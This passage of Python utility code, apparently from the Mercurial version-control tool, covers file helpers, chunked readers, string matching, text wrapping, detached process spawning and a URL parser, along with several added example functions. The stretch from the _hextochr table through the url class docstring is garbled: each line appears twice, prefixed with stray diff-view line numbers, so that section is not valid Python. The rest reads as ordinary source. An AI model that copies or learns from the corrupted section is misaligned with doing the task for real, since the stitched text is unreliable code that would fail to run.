        if safehasattr(self, '_fp'): # constructor actually did something
            self.discard()

    def __enter__(self):
        return self

    def __exit__(self, exctype, excvalue, traceback):
        if exctype is not None:
            self.discard()
        else:
            self.close()

def unlinkpath(f, ignoremissing=False):
    """unlink and remove the directory if it is empty"""
    if ignoremissing:
        tryunlink(f)
    else:
        unlink(f)
    # try removing directories that might now be empty
    try:
        removedirs(os.path.dirname(f))
    except OSError:
        pass

def tryunlink(f):
    """Attempt to remove a file, ignoring ENOENT errors."""
    try:
        unlink(f)
    except OSError as e:
        if e.errno != errno.ENOENT:
            raise

def makedirs(name, mode=None, notindexed=False):
    """recursive directory creation with parent mode inheritance

    Newly created directories are marked as "not to be indexed by
    the content indexing service", if ``notindexed`` is specified
    for "write" mode access.
    """
    try:
        makedir(name, notindexed)
    except OSError as err:
        if err.errno == errno.EEXIST:
            return
        if err.errno != errno.ENOENT or not name:
            raise
        parent = os.path.dirname(os.path.abspath(name))
        if parent == name:
            raise
        makedirs(parent, mode, notindexed)
        try:
            makedir(name, notindexed)
        except OSError as err:
            # Catch EEXIST to handle races
            if err.errno == errno.EEXIST:
                return
            raise
    if mode is not None:
        os.chmod(name, mode)

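# A short sketch: creating a nested tree with makedirs. The path is
# hypothetical; pre-existing directories and creation races are absorbed
# by the EEXIST handling above.
def _makedirs_example():
    makedirs(b'a/b/c', mode=0o755)
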
def readfile(path):
    with open(path, 'rb') as fp:
        return fp.read()

def writefile(path, text):
    with open(path, 'wb') as fp:
        fp.write(text)

def appendfile(path, text):
    with open(path, 'ab') as fp:
        fp.write(text)

class chunkbuffer(object):
    """Allow arbitrary sized chunks of data to be efficiently read from an
    iterator over chunks of arbitrary size."""

    def __init__(self, in_iter):
        """in_iter is the iterator that's iterating over the input chunks."""
        def splitbig(chunks):
            for chunk in chunks:
                if len(chunk) > 2**20:
                    pos = 0
                    while pos < len(chunk):
                        end = pos + 2 ** 18
                        yield chunk[pos:end]
                        pos = end
                else:
                    yield chunk
        self.iter = splitbig(in_iter)
        self._queue = collections.deque()
        self._chunkoffset = 0

    def read(self, l=None):
        """Read L bytes of data from the iterator of chunks of data.
        Returns less than L bytes if the iterator runs dry.

        If size parameter is omitted, read everything"""
        if l is None:
            return ''.join(self.iter)

        left = l
        buf = []
        queue = self._queue
        while left > 0:
            # refill the queue
            if not queue:
                target = 2**18
                for chunk in self.iter:
                    queue.append(chunk)
                    target -= len(chunk)
                    if target <= 0:
                        break
                if not queue:
                    break

            # The easy way to do this would be to queue.popleft(), modify the
            # chunk (if necessary), then queue.appendleft(). However, for cases
            # where we read partial chunk content, this incurs 2 dequeue
            # mutations and creates a new str for the remaining chunk in the
            # queue. Our code below avoids this overhead.

            chunk = queue[0]
            chunkl = len(chunk)
            offset = self._chunkoffset

            # Use full chunk.
            if offset == 0 and left >= chunkl:
                left -= chunkl
                queue.popleft()
                buf.append(chunk)
                # self._chunkoffset remains at 0.
                continue

            chunkremaining = chunkl - offset

            # Use all of unconsumed part of chunk.
            if left >= chunkremaining:
                left -= chunkremaining
                queue.popleft()
                # offset == 0 is enabled by block above, so this won't merely
                # copy via ``chunk[0:]``.
                buf.append(chunk[offset:])
                self._chunkoffset = 0

            # Partial chunk needed.
            else:
                buf.append(chunk[offset:offset + left])
                self._chunkoffset += left
                left -= chunkremaining

        return ''.join(buf)

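# Illustrative sketch: sized reads reassemble data across chunk
# boundaries regardless of how the producer split it.
def _chunkbuffer_example():
    buf = chunkbuffer(iter([b'abc', b'defg', b'h']))
    return (buf.read(4),  # -> 'abcd', spanning the first two chunks
            buf.read(4),  # -> 'efgh'
            buf.read(4))  # -> '' once the iterator is exhausted
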
def filechunkiter(f, size=131072, limit=None):
    """Create a generator that produces the data in the file size
    (default 131072) bytes at a time, up to optional limit (default is
    to read all data). Chunks may be less than size bytes if the
    chunk is the last chunk in the file, or the file is a socket or
    some other type of file that sometimes reads less data than is
    requested."""
    assert size >= 0
    assert limit is None or limit >= 0
    while True:
        if limit is None:
            nbytes = size
        else:
            nbytes = min(limit, size)
        s = nbytes and f.read(nbytes)
        if not s:
            break
        if limit:
            limit -= len(s)
        yield s

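# A sketch of the usual consumption pattern: streaming a file in bounded
# chunks instead of slurping it whole. The path is hypothetical.
def _filechunkiter_example(path):
    total = 0
    with open(path, 'rb') as fp:
        for chunk in filechunkiter(fp, size=65536):
            total += len(chunk)
    return total
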
class cappedreader(object):
    """A file object proxy that allows reading up to N bytes.

    Given a source file object, instances of this type allow reading up to
    N bytes from that source file object. Attempts to read past the allowed
    limit are treated as EOF.

    It is assumed that I/O is not performed on the original file object
    in addition to I/O that is performed by this instance. If there is,
    state tracking will get out of sync and unexpected results will ensue.
    """
    def __init__(self, fh, limit):
        """Allow reading up to <limit> bytes from <fh>."""
        self._fh = fh
        self._left = limit

    def read(self, n=-1):
        if not self._left:
            return b''

        if n < 0:
            n = self._left

        data = self._fh.read(min(n, self._left))
        self._left -= len(data)
        assert self._left >= 0

        return data

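# Illustrative sketch: capping reads on an open file object so a parser
# cannot run past a length-prefixed payload.
def _cappedreader_example(fh):
    capped = cappedreader(fh, 100)
    head = capped.read()   # at most 100 bytes, however long fh is
    tail = capped.read(10) # b'' once the cap or the file is exhausted
    return head, tail
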
def stringmatcher(pattern, casesensitive=True):
    """
    accepts a string, possibly starting with 're:' or 'literal:' prefix.
    returns the matcher name, pattern, and matcher function.
    missing or unknown prefixes are treated as literal matches.

    helper for tests:
    >>> def test(pattern, *tests):
    ...     kind, pattern, matcher = stringmatcher(pattern)
    ...     return (kind, pattern, [bool(matcher(t)) for t in tests])
    >>> def itest(pattern, *tests):
    ...     kind, pattern, matcher = stringmatcher(pattern, casesensitive=False)
    ...     return (kind, pattern, [bool(matcher(t)) for t in tests])

    exact matching (no prefix):
    >>> test(b'abcdefg', b'abc', b'def', b'abcdefg')
    ('literal', 'abcdefg', [False, False, True])

    regex matching ('re:' prefix)
    >>> test(b're:a.+b', b'nomatch', b'fooadef', b'fooadefbar')
    ('re', 'a.+b', [False, False, True])

    force exact matches ('literal:' prefix)
    >>> test(b'literal:re:foobar', b'foobar', b're:foobar')
    ('literal', 're:foobar', [False, True])

    unknown prefixes are ignored and treated as literals
    >>> test(b'foo:bar', b'foo', b'bar', b'foo:bar')
    ('literal', 'foo:bar', [False, False, True])

    case insensitive regex matches
    >>> itest(b're:A.+b', b'nomatch', b'fooadef', b'fooadefBar')
    ('re', 'A.+b', [False, False, True])

    case insensitive literal matches
    >>> itest(b'ABCDEFG', b'abc', b'def', b'abcdefg')
    ('literal', 'ABCDEFG', [False, False, True])
    """
    if pattern.startswith('re:'):
        pattern = pattern[3:]
        try:
            flags = 0
            if not casesensitive:
                flags = remod.I
            regex = remod.compile(pattern, flags)
        except remod.error as e:
            raise error.ParseError(_('invalid regular expression: %s')
                                   % e)
        return 're', pattern, regex.search
    elif pattern.startswith('literal:'):
        pattern = pattern[8:]

    match = pattern.__eq__

    if not casesensitive:
        ipat = encoding.lower(pattern)
        match = lambda s: ipat == encoding.lower(s)
    return 'literal', pattern, match

def shortuser(user):
    """Return a short representation of a user name or email address."""
    f = user.find('@')
    if f >= 0:
        user = user[:f]
    f = user.find('<')
    if f >= 0:
        user = user[f + 1:]
    f = user.find(' ')
    if f >= 0:
        user = user[:f]
    f = user.find('.')
    if f >= 0:
        user = user[:f]
    return user

def emailuser(user):
    """Return the user portion of an email address."""
    f = user.find('@')
    if f >= 0:
        user = user[:f]
    f = user.find('<')
    if f >= 0:
        user = user[f + 1:]
    return user

def email(author):
    '''get email of author.'''
    r = author.find('>')
    if r == -1:
        r = None
    return author[author.find('<') + 1:r]

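# A sketch of how the three helpers relate on a conventional
# "Name <address>" author string:
def _user_helpers_example():
    author = b'Joe User <joe.user@example.com>'
    return (email(author),            # -> 'joe.user@example.com'
            emailuser(email(author)), # -> 'joe.user'
            shortuser(author))        # -> 'joe'
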
def ellipsis(text, maxlength=400):
    """Trim string to at most maxlength (default: 400) columns in display."""
    return encoding.trim(text, maxlength, ellipsis='...')

def unitcountfn(*unittable):
    '''return a function that renders a readable count of some quantity'''

    def go(count):
        for multiplier, divisor, format in unittable:
            if abs(count) >= divisor * multiplier:
                return format % (count / float(divisor))
        return unittable[-1][2] % count

    return go

def processlinerange(fromline, toline):
    """Check that linerange <fromline>:<toline> makes sense and return a
    0-based range.

    >>> processlinerange(10, 20)
    (9, 20)
    >>> processlinerange(2, 1)
    Traceback (most recent call last):
      ...
    ParseError: line range must be positive
    >>> processlinerange(0, 5)
    Traceback (most recent call last):
      ...
    ParseError: fromline must be strictly positive
    """
    if toline - fromline < 0:
        raise error.ParseError(_("line range must be positive"))
    if fromline < 1:
        raise error.ParseError(_("fromline must be strictly positive"))
    return fromline - 1, toline

bytecount = unitcountfn(
    (100, 1 << 30, _('%.0f GB')),
    (10, 1 << 30, _('%.1f GB')),
    (1, 1 << 30, _('%.2f GB')),
    (100, 1 << 20, _('%.0f MB')),
    (10, 1 << 20, _('%.1f MB')),
    (1, 1 << 20, _('%.2f MB')),
    (100, 1 << 10, _('%.0f KB')),
    (10, 1 << 10, _('%.1f KB')),
    (1, 1 << 10, _('%.2f KB')),
    (1, 1, _('%.0f bytes')),
    )

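# Illustrative sketch: each table row is (multiplier, divisor, format),
# and the first row whose threshold the value reaches wins.
def _bytecount_example():
    # -> ['0 bytes', '999 bytes', '2.00 MB'] (modulo translation by _())
    return [bytecount(0), bytecount(999), bytecount(2097152)]
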
# Matches a single EOL which can either be a CRLF where repeated CR
# are removed or a LF. We do not care about old Macintosh files, so a
# stray CR is an error.
_eolre = remod.compile(br'\r*\n')

def tolf(s):
    return _eolre.sub('\n', s)

def tocrlf(s):
    return _eolre.sub('\r\n', s)

if pycompat.oslinesep == '\r\n':
    tonativeeol = tocrlf
    fromnativeeol = tolf
else:
    tonativeeol = pycompat.identity
    fromnativeeol = pycompat.identity

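# A sketch of the conversion: runs of CR directly before a LF collapse
# into the target line ending, per _eolre above.
def _eol_example():
    mixed = b'a\r\nb\nc\r\r\n'
    return (tolf(mixed),    # -> 'a\nb\nc\n'
            tocrlf(mixed))  # -> 'a\r\nb\r\nc\r\n'
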
def escapestr(s):
    # call underlying function of s.encode('string_escape') directly for
    # Python 3 compatibility
    return codecs.escape_encode(s)[0]

def unescapestr(s):
    return codecs.escape_decode(s)[0]

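# Illustrative sketch: escapestr/unescapestr are inverses, turning
# control bytes into backslash escapes and back.
def _escapestr_example():
    s = b'tab\there\nnul\x00'
    escaped = escapestr(s)            # -> 'tab\\there\\nnul\\x00'
    return unescapestr(escaped) == s  # -> True
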
def forcebytestr(obj):
    """Portably format an arbitrary object (e.g. exception) into a byte
    string."""
    try:
        return pycompat.bytestr(obj)
    except UnicodeEncodeError:
        # non-ascii string, may be lossy
        return pycompat.bytestr(encoding.strtolocal(str(obj)))

def uirepr(s):
    # Avoid double backslash in Windows path repr()
    return pycompat.byterepr(pycompat.bytestr(s)).replace(b'\\\\', b'\\')

# delay import of textwrap
def MBTextWrapper(**kwargs):
    class tw(textwrap.TextWrapper):
        """
        Extend TextWrapper for width-awareness.

        Neither the number of 'bytes' in any encoding nor the number of
        'characters' is appropriate for calculating the terminal columns
        occupied by a string.

        The original TextWrapper implementation uses the built-in 'len()'
        directly, so overriding is needed to use the width information of
        each character.

        In addition, characters classified as 'ambiguous' width are
        treated as wide in East Asian locales, but as narrow elsewhere.

        This requires the user's decision to determine the width of such
        characters.
        """
        def _cutdown(self, ucstr, space_left):
            l = 0
            colwidth = encoding.ucolwidth
            for i in xrange(len(ucstr)):
                l += colwidth(ucstr[i])
                if space_left < l:
                    return (ucstr[:i], ucstr[i:])
            return ucstr, ''

        # overriding of base class
        def _handle_long_word(self, reversed_chunks, cur_line, cur_len, width):
            space_left = max(width - cur_len, 1)

            if self.break_long_words:
                cut, res = self._cutdown(reversed_chunks[-1], space_left)
                cur_line.append(cut)
                reversed_chunks[-1] = res
            elif not cur_line:
                cur_line.append(reversed_chunks.pop())

        # this overriding code is imported from TextWrapper of Python 2.6
        # to calculate columns of string by 'encoding.ucolwidth()'
        def _wrap_chunks(self, chunks):
            colwidth = encoding.ucolwidth

            lines = []
            if self.width <= 0:
                raise ValueError("invalid width %r (must be > 0)" % self.width)

            # Arrange in reverse order so items can be efficiently popped
            # from a stack of chunks.
            chunks.reverse()

            while chunks:

                # Start the list of chunks that will make up the current line.
                # cur_len is just the length of all the chunks in cur_line.
                cur_line = []
                cur_len = 0

                # Figure out which static string will prefix this line.
                if lines:
                    indent = self.subsequent_indent
                else:
                    indent = self.initial_indent

                # Maximum width for this line.
                width = self.width - len(indent)

                # First chunk on line is whitespace -- drop it, unless this
                # is the very beginning of the text (i.e. no lines started yet).
                if self.drop_whitespace and chunks[-1].strip() == r'' and lines:
                    del chunks[-1]

                while chunks:
                    l = colwidth(chunks[-1])

                    # Can at least squeeze this chunk onto the current line.
                    if cur_len + l <= width:
                        cur_line.append(chunks.pop())
                        cur_len += l

                    # Nope, this line is full.
                    else:
                        break

                # The current line is full, and the next chunk is too big to
                # fit on *any* line (not just this one).
                if chunks and colwidth(chunks[-1]) > width:
                    self._handle_long_word(chunks, cur_line, cur_len, width)

                # If the last chunk on this line is all whitespace, drop it.
                if (self.drop_whitespace and
                    cur_line and cur_line[-1].strip() == r''):
                    del cur_line[-1]

                # Convert current line back to a string and store it in list
                # of all lines (return value).
                if cur_line:
                    lines.append(indent + r''.join(cur_line))

            return lines

    global MBTextWrapper
    MBTextWrapper = tw
    return tw(**kwargs)

def wrap(line, width, initindent='', hangindent=''):
    maxindent = max(len(hangindent), len(initindent))
    if width <= maxindent:
        # adjust for weird terminal size
        width = max(78, maxindent + 1)
    line = line.decode(pycompat.sysstr(encoding.encoding),
                       pycompat.sysstr(encoding.encodingmode))
    initindent = initindent.decode(pycompat.sysstr(encoding.encoding),
                                   pycompat.sysstr(encoding.encodingmode))
    hangindent = hangindent.decode(pycompat.sysstr(encoding.encoding),
                                   pycompat.sysstr(encoding.encodingmode))
    wrapper = MBTextWrapper(width=width,
                            initial_indent=initindent,
                            subsequent_indent=hangindent)
    return wrapper.fill(line).encode(pycompat.sysstr(encoding.encoding))

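# Illustrative sketch: folding a long byte string for a 30-column
# display, with a bullet on the first line and a hanging indent after.
def _wrap_example():
    line = b'a fairly long sentence that will not fit on one narrow line'
    return wrap(line, 30, initindent=b'* ', hangindent=b'  ')
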
if (pyplatform.python_implementation() == 'CPython' and
    sys.version_info < (3, 0)):
    # There is an issue in CPython that some IO methods do not handle EINTR
    # correctly. The following table shows what CPython version (and functions)
    # are affected (buggy: has the EINTR bug, okay: otherwise):
    #
    #                | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
    #   --------------------------------------------------
    #    fp.__iter__ | buggy   | buggy           | okay
    #    fp.read*    | buggy   | okay [1]        | okay
    #
    # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
    #
    # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
    # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
    #
    # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
    # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
    # CPython 2, because CPython 2 maintains an internal readahead buffer for
    # fp.__iter__ but not other fp.read* methods.
    #
    # On modern systems like Linux, the "read" syscall cannot be interrupted
    # when reading "fast" files like on-disk files. So the EINTR issue only
    # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
    # files approximately as "fast" files and use the fast (unsafe) code path,
    # to minimize the performance impact.
    if sys.version_info >= (2, 7, 4):
        # fp.readline deals with EINTR correctly, use it as a workaround.
        def _safeiterfile(fp):
            return iter(fp.readline, '')
    else:
        # fp.read* are broken too, manually deal with EINTR in a stupid way.
        # note: this may block longer than necessary because of bufsize.
        def _safeiterfile(fp, bufsize=4096):
            fd = fp.fileno()
            line = ''
            while True:
                try:
                    buf = os.read(fd, bufsize)
                except OSError as ex:
                    # os.read only raises EINTR before any data is read
                    if ex.errno == errno.EINTR:
                        continue
                    else:
                        raise
                line += buf
                if '\n' in buf:
                    splitted = line.splitlines(True)
                    line = ''
                    for l in splitted:
                        if l[-1] == '\n':
                            yield l
                        else:
                            line = l
                if not buf:
                    break
            if line:
                yield line

    def iterfile(fp):
        fastpath = True
        if type(fp) is file:
            fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
        if fastpath:
            return fp
        else:
            return _safeiterfile(fp)
else:
    # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
    def iterfile(fp):
        return fp

def iterlines(iterator):
    for chunk in iterator:
        for line in chunk.splitlines():
            yield line

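# Illustrative sketch of the two line-oriented helpers above:
def _iterfile_example(fp):
    # iterate a (possibly slow) file object line by line; on CPython 2
    # the non-regular-file path is EINTR-safe
    lines = [l for l in iterfile(fp)]
    # iterlines() instead flattens an iterator of chunks; a line spanning
    # two chunks would come out in pieces, so feed line-aligned chunks:
    lines += iterlines(iter([b'one\ntwo\n', b'three\n']))
    return lines  # the last three entries are 'one', 'two', 'three'
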
def expandpath(path):
    return os.path.expanduser(os.path.expandvars(path))

def hgcmd():
    """Return the command used to execute current hg

    This is different from hgexecutable() because on Windows we want
    to avoid things opening new shell windows like batch files, so we
    get either the python call or current executable.
    """
    if mainfrozen():
        if getattr(sys, 'frozen', None) == 'macosx_app':
            # Env variable set by py2app
            return [encoding.environ['EXECUTABLEPATH']]
        else:
            return [pycompat.sysexecutable]
    return gethgcmd()

def rundetached(args, condfn):
    """Execute the argument list in a detached process.

    condfn is a callable which is called repeatedly and should return
    True once the child process is known to have started successfully.
    At this point, the child process PID is returned. If the child
    process fails to start or finishes before condfn() evaluates to
    True, return -1.
    """
    # Windows case is easier because the child process is either
    # successfully starting and validating the condition or exiting
    # on failure. We just poll on its PID. On Unix, if the child
    # process fails to start, it will be left in a zombie state until
    # the parent waits on it, which we cannot do since we expect a long
    # running process on success. Instead we listen for SIGCHLD telling
    # us our child process terminated.
    terminated = set()
    def handler(signum, frame):
        terminated.add(os.wait())
    prevhandler = None
    SIGCHLD = getattr(signal, 'SIGCHLD', None)
    if SIGCHLD is not None:
        prevhandler = signal.signal(SIGCHLD, handler)
    try:
        pid = spawndetached(args)
        while not condfn():
            if ((pid in terminated or not testpid(pid))
                and not condfn()):
                return -1
            time.sleep(0.1)
        return pid
    finally:
        if prevhandler is not None:
            signal.signal(signal.SIGCHLD, prevhandler)

def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
    """Return the result of interpolating items in the mapping into string s.

    prefix is a single character string, or a two character string with
    a backslash as the first character if the prefix needs to be escaped in
    a regular expression.

    fn is an optional function that will be applied to the replacement text
    just before replacement.

    escape_prefix is an optional flag that allows using doubled prefix for
    its escaping.
    """
    fn = fn or (lambda s: s)
    patterns = '|'.join(mapping.keys())
    if escape_prefix:
        patterns += '|' + prefix
        if len(prefix) > 1:
            prefix_char = prefix[1:]
        else:
            prefix_char = prefix
        mapping[prefix_char] = prefix_char
    r = remod.compile(br'%s(%s)' % (prefix, patterns))
    return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)

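# Illustrative sketch: a '%' prefix is regex-safe as-is; a special
# character such as '$' would be passed as the two-character br'\$'.
# The mapping keys here are hypothetical.
def _interpolate_example():
    mapping = {b'user': b'alice', b'repo': b'hg'}
    # -> 'pushed to hg by alice'
    return interpolate(b'%', mapping, b'pushed to %repo by %user')
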
def getport(port):
    """Return the port for a given network service.

    If port is an integer, it's returned as is. If it's a string, it's
    looked up using socket.getservbyname(). If there's no matching
    service, error.Abort is raised.
    """
    try:
        return int(port)
    except ValueError:
        pass

    try:
        return socket.getservbyname(pycompat.sysstr(port))
    except socket.error:
        raise Abort(_("no port number associated with service '%s'") % port)

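# A short sketch: numeric values pass through, names go through the
# system services database.
def _getport_example():
    return (getport(8080),    # -> 8080, integers are returned as-is
            getport('8080'),  # -> 8080, numeric strings are parsed
            getport('http'))  # -> 80, if 'http' is in the services db
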
_booleans = {'1': True, 'yes': True, 'true': True, 'on': True, 'always': True,
             '0': False, 'no': False, 'false': False, 'off': False,
             'never': False}

def parsebool(s):
    """Parse s into a boolean.

    If s is not a valid boolean, returns None.
    """
    return _booleans.get(s.lower(), None)

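# A short sketch: matching is case-insensitive, and anything
# unrecognized maps to None rather than raising.
def _parsebool_example():
    return (parsebool('Yes'),    # -> True
            parsebool('0'),      # -> False
            parsebool('maybe'))  # -> None
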
2747 _hextochr = dict((a + b, chr(int(a + b, 16)))
2750 _hextochr = dict((a + b, chr(int(a + b, 16)))
2748 for a in string.hexdigits for b in string.hexdigits)
2751 for a in string.hexdigits for b in string.hexdigits)
2749
2752
2750 class url(object):
2753 class url(object):
2751 r"""Reliable URL parser.
2754 r"""Reliable URL parser.
2752
2755
2753 This parses URLs and provides attributes for the following
2756 This parses URLs and provides attributes for the following
2754 components:
2757 components:
2755
2758
2756 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2759 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2757
2760
2758 Missing components are set to None. The only exception is
2761 Missing components are set to None. The only exception is
2759 fragment, which is set to '' if present but empty.
2762 fragment, which is set to '' if present but empty.
2760
2763
2761 If parsefragment is False, fragment is included in query. If
2764 If parsefragment is False, fragment is included in query. If
2762 parsequery is False, query is included in path. If both are
2765 parsequery is False, query is included in path. If both are
2763 False, both fragment and query are included in path.
2766 False, both fragment and query are included in path.
2764
2767
2765 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2768 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2766
2769
2767 Note that for backward compatibility reasons, bundle URLs do not
2770 Note that for backward compatibility reasons, bundle URLs do not
2768 take host names. That means 'bundle://../' has a path of '../'.
2771 take host names. That means 'bundle://../' has a path of '../'.
2769
2772
2770 Examples:
2773 Examples:
2771
2774
2772 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2775 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2773 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2776 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2774 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2777 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2775 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2778 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2776 >>> url(b'file:///home/joe/repo')
2779 >>> url(b'file:///home/joe/repo')
2777 <url scheme: 'file', path: '/home/joe/repo'>
2780 <url scheme: 'file', path: '/home/joe/repo'>
2778 >>> url(b'file:///c:/temp/foo/')
2781 >>> url(b'file:///c:/temp/foo/')
2779 <url scheme: 'file', path: 'c:/temp/foo/'>
2782 <url scheme: 'file', path: 'c:/temp/foo/'>
2780 >>> url(b'bundle:foo')
2783 >>> url(b'bundle:foo')
2781 <url scheme: 'bundle', path: 'foo'>
2784 <url scheme: 'bundle', path: 'foo'>
2782 >>> url(b'bundle://../foo')
2785 >>> url(b'bundle://../foo')
2783 <url scheme: 'bundle', path: '../foo'>
2786 <url scheme: 'bundle', path: '../foo'>
2784 >>> url(br'c:\foo\bar')
2787 >>> url(br'c:\foo\bar')
2785 <url path: 'c:\\foo\\bar'>
2788 <url path: 'c:\\foo\\bar'>
2786 >>> url(br'\\blah\blah\blah')
2789 >>> url(br'\\blah\blah\blah')
2787 <url path: '\\\\blah\\blah\\blah'>
2790 <url path: '\\\\blah\\blah\\blah'>
2788 >>> url(br'\\blah\blah\blah#baz')
2791 >>> url(br'\\blah\blah\blah#baz')
2789 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2792 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2790 >>> url(br'file:///C:\users\me')
2793 >>> url(br'file:///C:\users\me')
2791 <url scheme: 'file', path: 'C:\\users\\me'>
2794 <url scheme: 'file', path: 'C:\\users\\me'>
2792
2795
2793 Authentication credentials:
2796 Authentication credentials:
2794
2797
2795 >>> url(b'ssh://joe:xyz@x/repo')
2798 >>> url(b'ssh://joe:xyz@x/repo')
2796 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2799 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2797 >>> url(b'ssh://joe@x/repo')
2800 >>> url(b'ssh://joe@x/repo')
2798 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2801 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2799
2802
2800 Query strings and fragments:
2803 Query strings and fragments:
2801
2804
2802 >>> url(b'http://host/a?b#c')
2805 >>> url(b'http://host/a?b#c')
2803 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2806 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2804 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2807 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2805 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2808 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2806
2809
2807 Empty path:
2810 Empty path:
2808
2811
2809 >>> url(b'')
2812 >>> url(b'')
2810 <url path: ''>
2813 <url path: ''>
2811 >>> url(b'#a')
2814 >>> url(b'#a')
2812 <url path: '', fragment: 'a'>
2815 <url path: '', fragment: 'a'>
2813 >>> url(b'http://host/')
2816 >>> url(b'http://host/')
2814 <url scheme: 'http', host: 'host', path: ''>
2817 <url scheme: 'http', host: 'host', path: ''>
2815 >>> url(b'http://host/#a')
2818 >>> url(b'http://host/#a')
2816 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2819 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2817
2820
2818 Only scheme:
2821 Only scheme:
2819
2822
2820 >>> url(b'http:')
2823 >>> url(b'http:')
2821 <url scheme: 'http'>
2824 <url scheme: 'http'>
2822 """
2825 """
2823
2826
2824 _safechars = "!~*'()+"
2827 _safechars = "!~*'()+"
2825 _safepchars = "/!~*'()+:\\"
2828 _safepchars = "/!~*'()+:\\"
2826 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2829 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2827
2830
    def __init__(self, path, parsequery=True, parsefragment=True):
        # We slowly chomp away at path until we have only the path left
        self.scheme = self.user = self.passwd = self.host = None
        self.port = self.path = self.query = self.fragment = None
        self._localpath = True
        self._hostport = ''
        self._origpath = path

        if parsefragment and '#' in path:
            path, self.fragment = path.split('#', 1)

        # special case for Windows drive letters and UNC paths
        if hasdriveletter(path) or path.startswith('\\\\'):
            self.path = path
            return

        # For compatibility reasons, we can't handle bundle paths as
        # normal URLS
        if path.startswith('bundle:'):
            self.scheme = 'bundle'
            path = path[7:]
            if path.startswith('//'):
                path = path[2:]
            self.path = path
            return

        if self._matchscheme(path):
            parts = path.split(':', 1)
            if parts[0]:
                self.scheme, path = parts
                self._localpath = False

        if not path:
            path = None
            if self._localpath:
                self.path = ''
                return
        else:
            if self._localpath:
                self.path = path
                return

            if parsequery and '?' in path:
                path, self.query = path.split('?', 1)
                if not path:
                    path = None
                if not self.query:
                    self.query = None

            # // is required to specify a host/authority
            if path and path.startswith('//'):
                parts = path[2:].split('/', 1)
                if len(parts) > 1:
                    self.host, path = parts
                else:
                    self.host = parts[0]
                    path = None
                if not self.host:
                    self.host = None
                    # path of file:///d is /d
                    # path of file:///d:/ is d:/, not /d:/
                    if path and not hasdriveletter(path):
                        path = '/' + path

            if self.host and '@' in self.host:
                self.user, self.host = self.host.rsplit('@', 1)
                if ':' in self.user:
                    self.user, self.passwd = self.user.split(':', 1)
                if not self.host:
                    self.host = None

            # Don't split on colons in IPv6 addresses without ports
            if (self.host and ':' in self.host and
                not (self.host.startswith('[') and self.host.endswith(']'))):
                self._hostport = self.host
                self.host, self.port = self.host.rsplit(':', 1)
                if not self.host:
                    self.host = None

            if (self.host and self.scheme == 'file' and
                self.host not in ('localhost', '127.0.0.1', '[::1]')):
                raise Abort(_('file:// URLs can only refer to localhost'))

        self.path = path

        # leave the query string escaped
        for a in ('user', 'passwd', 'host', 'port',
                  'path', 'fragment'):
            v = getattr(self, a)
            if v is not None:
                setattr(self, a, urlreq.unquote(v))

    @encoding.strmethod
    def __repr__(self):
        attrs = []
        for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
                  'query', 'fragment'):
            v = getattr(self, a)
            if v is not None:
                attrs.append('%s: %r' % (a, v))
        return '<url %s>' % ', '.join(attrs)

    def __bytes__(self):
        r"""Join the URL's components back into a URL string.

        Examples:

        >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
        'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
        >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
        'http://user:pw@host:80/?foo=bar&baz=42'
        >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
        'http://user:pw@host:80/?foo=bar%3dbaz'
        >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
        'ssh://user:pw@[::1]:2200//home/joe#'
        >>> bytes(url(b'http://localhost:80//'))
        'http://localhost:80//'
        >>> bytes(url(b'http://localhost:80/'))
        'http://localhost:80/'
        >>> bytes(url(b'http://localhost:80'))
        'http://localhost:80/'
        >>> bytes(url(b'bundle:foo'))
        'bundle:foo'
        >>> bytes(url(b'bundle://../foo'))
        'bundle:../foo'
        >>> bytes(url(b'path'))
        'path'
        >>> bytes(url(b'file:///tmp/foo/bar'))
        'file:///tmp/foo/bar'
        >>> bytes(url(b'file:///c:/tmp/foo/bar'))
        'file:///c:/tmp/foo/bar'
        >>> print(url(br'bundle:foo\bar'))
